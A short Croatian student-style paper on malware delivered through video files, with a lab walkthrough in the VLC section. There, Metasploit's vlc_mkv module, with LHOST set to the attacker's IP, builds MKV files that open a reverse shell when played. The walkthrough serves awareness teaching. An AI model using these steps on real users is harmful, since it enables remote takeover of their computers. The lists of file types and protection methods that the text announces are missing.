Sadržaj

Malware u video datotekama

Sažetak

Jedan od ne toliko očitih i rijetkih napada je malware u video datotekama. Pošto većina ljudi nekada preuzima neke video datoteke, dobro je znati kako napadač razmišlja i na koje načine nam može pokušati podijeliti video datoteku u koju je zarazio nekim malwareom. Kroz ovaj rad, proći će se kroz neke metode napada, ranjivosti video playera, jedan konkretan primjer napada te što je bitno znati da ne zarazimo vlastito računalo napadačevim malwareom.

Uvod

Ljudi svakoga dana gledaju videe na svom računalu preko različitih aplikacija i web stranica, ali nekada i preuzmu video s nekih web stranica i možda slučajno preuzmu video datoteku zaraženu nekim malwareom a da to niti ne znaju. Kada pokrenu video preko svog najdražeg video playera, mogu napadaču dati pristup svom računalu. Iako je ovo jedan od rijetkih načina da napadač dođe do podataka žrtve, dobro je znati kako se zaštititi od ovakvih napada i srećom nije teško ako je korisnik informiran.

Metode napada

Napadači koji koriste malware u video datotekama iskorištavaju propuste unutar video playera kako bi korisniku zarazili računalo. Osim što napadači znaju koje slabosti video playera mogu iskoristiti, jako dobro znaju i tipove datoteka u koje stavljaju malware. Jedan od najčešće korištenih vrsta video datoteka je mp4 i sigurno je prva asocijacija kada netko kaže video datoteka, ali postoje još mnoge vrste video datoteka i svaka od njih napadaču može koristiti za različite načine napada. Neke vrste datoteka i metode napada koje omogućavaju:

Iskorištavanje ranjivosti VLC-a

VLC je popularni besplatni media player preko kojega se mogu pokretati videi i unutar njega postoje razne ranjivosti koje napadači mogu iskoristiti kako bi došli do podataka žrtve. U ovom primjeru bit će prikazan primjer napada korištenjem Metasploita na VLC ranjivosti kojim napadač dobiva pristup računalu žrtve. Koriste se dvije virtualne mašine, jedan Linux za napadača i Windows 10 za žrtvu. U Linuxu u terminalu se pokrene Metasploit te se upiše:

search vlc

Zatim se otvori lista ranjivosti koje se mogu iskoristiti i za ovaj primjer ćemo izabrati vlc_mkv tako da u terminal upišemo:

use exploit/windows/fileformat/vlc_mkv

Sada se treba vidjeti koje parametre moramo postaviti naredbom:

show options

Na zaslonu se ispisuje:

Slika 1. Ispis u terminalu nakon upisivanja naredbe show options

Parametar koji treba postaviti je IP adresa napadača naredbom:

set LHOST <ip_adresa>

Kada se to upiše, mogu se izraditi datoteke naredbom:

exploit

Kreiraju se dvije datoteke koje napadač postavlja na svoju web stranicu s koje će ih žrtva preuzeti. Ovaj napad je TCP reverse napad kojim napadač dobiva pristup računalu žrtve. Kada napadač postavi datoteke na svoju web stranicu, čeka da žrtva preuzme datoteke i pokrene ih. Kada žrtva preuzme video i pokrene ga pomoću VLC playera, napadač u svom terminalu dobiva pristup računalu žrtve i može raditi što želi.

Slika 2. Napadač u terminalu pristupa žrtvinom računalu

Metode zaštite

Srećom, otvaranjem zaražene datoteke nećemo pokrenuti maliciozan program ili dio koda koji se nalazi u njoj ako koristimo neki od provjerenih video playera koji će provjeriti je li datoteka sigurna za otvaranje. Nekoliko metoda zaštite su:

Zaključak

Iako napadi preko video datoteka nisu toliko česti ako se pažljivo i savjesno koristimo internetom, treba paziti i biti svjestan da prijetnja postoji. Najlakši način zaštite je uvijek prevencija, tj. da ne preuzimamo datoteke sa sumnjivih web stranica, ali ako ipak skinemo neku zaraženu datoteku, možemo biti pažljivi s njom i ne zaraziti vlastito računalo ako pažljivo baratamo s njom i pregledamo ju. Napadač može raznim napadima doći do velike količine informacija i datoteka na žrtvinom računalu i zato je bitno biti oprezan.

Literatura

[1] Yiyi Miao: Can A Video File Contain A Virus?, September 17, 2020

[2] Gaining Access to Windows10 Through VLC Exploit, November 14, 2019